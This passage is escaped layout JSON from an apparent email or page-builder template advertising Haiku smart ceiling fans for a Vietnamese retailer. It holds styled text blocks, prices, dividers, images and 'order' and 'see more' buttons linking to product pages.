\\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">31.5 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jHZ3ZDXmb_\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cao-cap-haiku-i-60inch-mau-den.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_14\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_34\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_24\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"h2d6KUlkns\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"f6A4my_Pms\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VdDHPWt0iP\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"12px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"hE75zgOYYF\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"pRAkwR5iCb\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AG1wZls3cI\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"q53kjy0Fbp\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kXlgdO_sPN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z5SNU6N6JW\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_21\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\">KH\\u00d4NG CH\\u1ec8 M\\u00c1T - M\\u00c0 C\\u00d2N H\\u01a0N TH\\u1ebe N\\u1eeeA ?<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ypX1LDDnWm\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ecf0f1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_26\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<br \\/>B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"SQpFTgzFHB\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/bai-viet\\/senseme\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"20px 30px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM C\\u00d4NG NGH\\u00ca SENSEME<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":279,\\\"calculatedHeight\\\":57}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#ef0d33\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"R_AV9AZjR_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"LO80TmK1uI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"plSJG4Z-kl\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_19\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"asWld2pGJl\\\",\\\"cells\\\":[49.83,50.17],\\\"columns\\\":[{\\\"id\\\":\\\"e-sogD6YwY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UH__OC3KxN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU - SMART CEILING FANS<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"y9l55XPumV\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\"><strong>THI\\u1ebeT K\\u1ebe TH\\u1ee6 C\\u00d4NG<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"EcccuM4Uwh\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontSize\\\":\\\"13px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe THI\\u1ebeT K\\u1ebe T\\u1eeaNG KH\\u00d4NG GIAN<\\/strong>\\\"}},{\\\"id\\\":\\\"6CEH_UVsP-\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#0e0f13\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_22\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Haiku v\\u1edbi thi\\u1ebft k\\u1ebf chuy\\u00ean nghi\\u1ec7p ki\\u1ec3m so\\u00e1t hi\\u1ec7u qu\\u1ea3 ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n \\u1edf m\\u1ee9c t\\u1ed1i \\u01b0u t\\u1eebng v\\u00f2ng quay th\\u00f4ng qua c\\u00f4ng ngh\\u1ec7 c\\u1ea3m bi\\u1ebfn\\u00a0<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uPKyGk_-mK\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 14px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_9\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":109,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"fsD97o3vAj\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Xq0WFxLUHL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764909825-haiku_caramel_bamboo.jpg\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_11\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"i1aayj1OCs\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"1swPbJHMCz\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AVkIerpg3f\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_22\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_16\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"j9TnibP9Xl\\\",\\\"cells\\\":[48.17,51.83],\\\"columns\\\":[{\\\"id\\\":\\\"taZ8dzbo1M\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VivHHBb3e6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764821104-abacus.jpg\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_20\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"9dOES5WBCA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qX8h97rG_z\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px 0px 